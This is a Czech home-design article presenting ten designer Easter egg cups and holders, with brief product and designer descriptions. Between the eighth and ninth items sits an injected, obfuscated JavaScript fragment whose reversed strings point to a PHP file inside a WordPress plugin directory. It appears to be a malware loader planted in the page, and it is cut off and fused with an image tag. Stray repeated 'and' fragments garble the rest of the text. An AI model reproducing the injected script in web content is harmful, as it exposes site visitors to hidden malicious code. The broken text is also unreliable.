FACESTARBydleníDESET VELIKONOČNÍCH LAHŮDEK: I NA VEJCE LZE POHLÍŽET DESIGNOVĚ!

DESET VELIKONOČNÍCH LAHŮDEK: I NA VEJCE LZE POHLÍŽET DESIGNOVĚ!

1/ Nohavice pro vejce

1/ Nohavice pro vejce

Dáváte si rádi k snídani vejce na měkko, lidově na hniličku? Pak mu pořiďte stylové kalhotky. Stojánek na vejce Egg Pants navrhla designérka Liz Kinnmark.

and

and

2/ Mimozemská snídaně

Pozor, na jídelní stůl přistává UFO! Držák na vejce s názvem Egg 51 je počinem designéra Itamara Bursteina a firmy Monkey Business. Jak se vám líbí?

and and

 

3/ Designové křeslo pro vejce?

Proč ne. Toto měkké a pohodlné sedátko pro symbol Velikonoc pochází z dílny Anima Dinamica. Jeho předlohou byla kultovní židle Ovalia Egg z roku 1960. Držátko je ze silikonu, vhodné do myčky i do trouby.

and

and

4/ Má nohy a neuteče

Tohle bude vaše děti bavit – vajíčka s nožičkama. Velikonoční stojánek Påskynda od Ikea se nabízí v několika veselých barvách. Stačí už jen nechat vyrobit děti zobáčky a vtipná dekorace je na světě.

 

 

5/ Gumový pohárek

Pouzdro na vajíčko z odolné gumy využijete při servírování i během vaření v kuchyni. Navrhl jej Rikke Hagen pro firmu Norman Copenhagen a vybírat můžete mezi modrým fialovým, bílým a černým provedením.

and

6/ Pro pořádek

 

Pro milovníky puristického designu a čistého stolu byla navržena elegantní sada Blomus Tito. Set obsahuje dvě misky z bílého porcelánu osazené nerezovým držákem na vejce. V minimalistickém držáku byl vytvořen otvor pro odkládání oloupané skořápky.

andand

 

7/ Seznamte se, Mr. Chin.

Stojánek na vejce Mr. Chin s vlastním zásobníkem na sůl na lžičkou pro pohodlné loupání a nabírání sousta. Ručně malované funkční figurky z termoplastické pryskyřice navrhl Stefano Giovannoni pro Alessi.

and

8/ Noblesní snídaně

Oblékněte ranní vajíčka do elegantních šatů… Stojánek Alessi Dressed v několika barevných variacích s nerezovou lžičkou pochází z hlavy Marcela Wanderses a bude ozdobu svátečního stolu.

andand$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahanders-dressed.jpg“ />

9/ A trochu geometrie…

Napadlo vás někdy, že může dokonale zaoblené vejce nehnutě držet v hranaté misce? Pohárek Mode Egg3 je toho důkazem. Dva silikonové pohárky lze po použití sestavit do kostky a použít jako originální dekoraci.

andand

10/ Skladné barvičky

A něco málo jarních pastelových barev na závěr. Sagaform Eggcups, to jsou porcelánové kroužky na vajíčka doplněné o praktický dřevěný stojánek. Spolehlivě dodají svěží barvy do vaší kuchyně.

and

Související články